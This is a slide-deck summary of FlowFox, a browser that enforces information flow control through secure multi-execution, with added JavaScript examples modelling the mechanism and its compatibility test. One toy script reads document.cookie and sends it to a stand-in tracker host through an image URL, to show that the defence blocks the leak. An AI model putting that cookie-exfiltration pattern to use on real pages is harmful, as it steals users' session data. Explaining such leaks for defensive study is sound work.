flowfox a web browser with flexible and precise information control


Upload: sybil-davidson

Post on 24-Dec-2015


Page 1: FLOWFOX A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL

FLOWFOX

A WEB BROWSER WITH FLEXIBLE AND PRECISE INFORMATION CONTROL

Page 2

ROADMAP

1. Background

2. Threat Model

3. Design

4. Security Policies

5. Implementation

6. Evaluation

Page 3

BACKGROUND

The same-origin policy (SOP) has holes

1. Examples to bypass SOP

2. More powerful security enforcement mechanisms are required.

XMLHttpRequest?

Page 4

BACKGROUND

Information flow control

Any program can be seen as a machine with inputs and outputs. Inputs can be classified as high-confidentiality inputs and low-confidentiality inputs; the same holds for outputs.

Page 5

BACKGROUND

Example for Information flow analysis

High input: document.getElementById('email.input').text

Low output: *.src = *

Page 6

BACKGROUND

Noninterference

A program is defined to be noninterferent if its outputs cannot be influenced by inputs at a higher security level than their own.

Termination-insensitive noninterference

1. A version of Noninterference.

2. Under the assumption that a program always terminates normally, information is only disclosed by the program when it terminates.

3. Many existing tools can effectively verify a program as long as the assumption holds

Page 7

BACKGROUND

Termination-insensitive noninterference vs. termination-sensitive noninterference

Page 8

BACKGROUND

In the context of web security

Many state-of-the-art information flow systems can detect the information leak in this case

Page 9

BACKGROUND

Timing-insensitive noninterference

Assumption: the execution result has nothing to do with the execution time

Page 10

BACKGROUND

Secure Multi-Execution ([18])

1. An information flow control enforcement mechanism

2. As its name suggests, secure multi-execution will execute a program multiple times, once for each security level.

3. The SME regime guarantees noninterference

4. FlowFox implements SME

Page 11

BACKGROUND

Secure Multi-Execution Rule

Image.src

Document.cookie

Image.width

Page 12

BACKGROUND

Example of Secure Multi-Execution

Page 13

BACKGROUND

Secure Multi-Execution

Pros:

1. Secure multi-execution is sound

2. Secure multi-execution is precise

Cons:

1. Cost in CPU time and memory use

Page 14

THREAT MODEL

Examples

1. Session Hijacking

2. Malicious Advertisements (Plugins)

3. History Sniffing and Behavior Tracking

Page 15

FLOWFOX DESIGN

Two Design Alternatives

1. Multi-execute entire browser:

1. Easy to implement

2. Too coarse-grained and imprecise

Page 16

FLOWFOX DESIGN

Two Design Alternatives

2. Multi-execute the web scripts (FlowFox)

1. Treat all interactions with the browser API as inputs and outputs

2. Fine-grained

3. Hard to implement

Page 17

SECURITY POLICIES

1. Policies are specified over the DOM API

2. A FlowFox policy specifies two things

1. Security levels for DOM API calls

2. A default value for each DOM API call

3. Policy Rule

Page 18

SECURITY POLICIES

4. Examples
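The following is an added toy model of secure multi-execution, not FlowFox's own code: a script is run once per security level, each run sees only inputs at or below its level (the policy's default value otherwise), and an output is performed only by the run at that output's level. The policy, the leaky script and the `tracker.example` URL are constructed for the example; the event rule from the implementation slides (low events run in both executions, high events only in the high one) is modelled by `dispatch`.

```javascript
// Security levels used by the toy policy.
const LOW = 0, HIGH = 1;

// Constructed policy after the slides' example: reading document.cookie is
// HIGH with default value "", writing an image src is a LOW output.
const policy = {
  "document.cookie": { level: HIGH, defaultValue: "" },
  "image.src":       { level: LOW },
};

// Build the browser API as seen by one execution at level `runLevel`.
function makeApi(runLevel, world, log) {
  return {
    // Input: a run sees the real value only if its level is at least the
    // input's level; lower runs get the policy's default value.
    read(name) {
      const p = policy[name];
      return runLevel >= p.level ? world[name] : p.defaultValue;
    },
    // Output: only the run whose level equals the output's level performs it;
    // all other runs have their output suppressed.
    write(name, value) {
      if (runLevel === policy[name].level) log.push({ name, value });
    },
  };
}

// Secure multi-execution: run the script once per level, lowest first,
// and return the outputs that were actually performed.
function sme(script, world) {
  const log = [];
  for (const level of [LOW, HIGH]) script(makeApi(level, world, log));
  return log;
}

// Event handling: an event at `eventLevel` is delivered to every execution
// whose level is at least that of the event.
function dispatch(eventLevel, handler, world) {
  const log = [];
  for (const level of [LOW, HIGH]) {
    if (level >= eventLevel) handler(makeApi(level, world, log));
  }
  return log;
}

// Constructed leaky script: copies a secret into a network-visible URL.
function leakyScript(api) {
  const secret = api.read("document.cookie");
  api.write("image.src", "https://tracker.example/?c=" + encodeURIComponent(secret));
}
```

Running `sme(leakyScript, { "document.cookie": "session=abc123" })` yields a single image load whose URL carries the empty default instead of the cookie, because the LOW run never saw the secret and the HIGH run's LOW output was dropped.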

Page 19

IMPLEMENTATION

1. Implemented on top of Mozilla Firefox and consists of about 1400 new lines of C/C++ code

2. SME-aware JavaScript Engine

1. JSContext has a security level field

2. Each property of JSObject has a security level field

3. Only properties with the same security level as the corresponding JSContext are visible

3. SME/IO Process

4. Event Handling

1. Low events will be handled by both the low and high executions

2. High events will only be handled by the high execution.

Page 20

EVALUATION

1. Security

1. Is FlowFox noninterferent?

1. Two reasons FlowFox could fail to be noninterferent

1. The assumptions underlying the soundness proof are violated

2. Implementation-level vulnerabilities exist

2. Hard to guarantee.

Page 21

EVALUATION

1. Security

1. Examples of mitigating threats

1. Leaking Session Cookies

2. History Sniffing

3. Tracking Libraries

Page 22

EVALUATION

2. Compatibility

1. Two regular Firefox browsers and one FlowFox browser

2. A simple policy that makes reading document.cookie high

3. A crawler dumps a screenshot of each of the three browsers to a bitmap

4. First, compare the bitmaps belonging to the two Firefox browsers and find the area where they agree (the unmasked area).

5. Second, compare the unmasked areas of the bitmaps belonging to the Firefox and FlowFox browsers.
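The two-step screenshot comparison above, written out as an added example (not the paper's crawler code). Bitmaps are constructed as arrays of pixel rows, with short strings standing in for colour values; the two Firefox runs are assumed to differ only where the page shows nondeterministic content such as rotating ads.

```javascript
// Step 1: the unmasked area is the set of pixels on which two regular
// Firefox renderings agree. Anything that differs between them (ads,
// timestamps, animations) is masked out so it cannot count as a FlowFox bug.
function unmaskedArea(ff1, ff2) {
  return ff1.map((row, y) => row.map((px, x) => px === ff2[y][x]));
}

// Step 2: inside the unmasked area only, count how many FlowFox pixels match
// the Firefox rendering. A ratio below 1 points at a real rendering
// difference caused by the policy (here: document.cookie reads being high).
function compatibilityScore(ff1, ff2, flowfox) {
  const mask = unmaskedArea(ff1, ff2);
  let compared = 0, matching = 0;
  for (let y = 0; y < mask.length; y++) {
    for (let x = 0; x < mask[y].length; x++) {
      if (!mask[y][x]) continue;           // masked: nondeterministic pixel
      compared++;
      if (flowfox[y][x] === ff1[y][x]) matching++;
    }
  }
  return { compared, matching, ratio: compared ? matching / compared : 1 };
}

// Constructed 2x3 bitmaps: the middle column is an ad that differs between
// the two Firefox runs; FlowFox additionally differs at the bottom-right pixel.
const ff1 = [["w", "A", "w"], ["w", "B", "w"]];
const ff2 = [["w", "X", "w"], ["w", "Y", "w"]];
const flowfox = [["w", "Z", "w"], ["w", "w", "g"]];
```

For the constructed bitmaps the mask keeps four pixels, three of which FlowFox renders identically, giving a ratio of 0.75; the differing ad column is ignored entirely.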

Page 23

EVALUATION

3. Micro Benchmark

1. Measure the overhead of executing pure JavaScript.

2. Measure the overhead for I/O intensive applications.

3. Executing pure JavaScript incurs a large overhead

4. The I/O test shows only a negligible overhead

Page 24

EVALUATION

4. Macro Benchmark

1. Measure the impact on the latency perceived by a browser user

2. The results show that the user-perceived latency for real-life web applications is acceptable

Page 25

EVALUATION

5. Memory Benchmark

1. Measuring 500 different websites

2. FlowFox incurred a memory overhead of 88%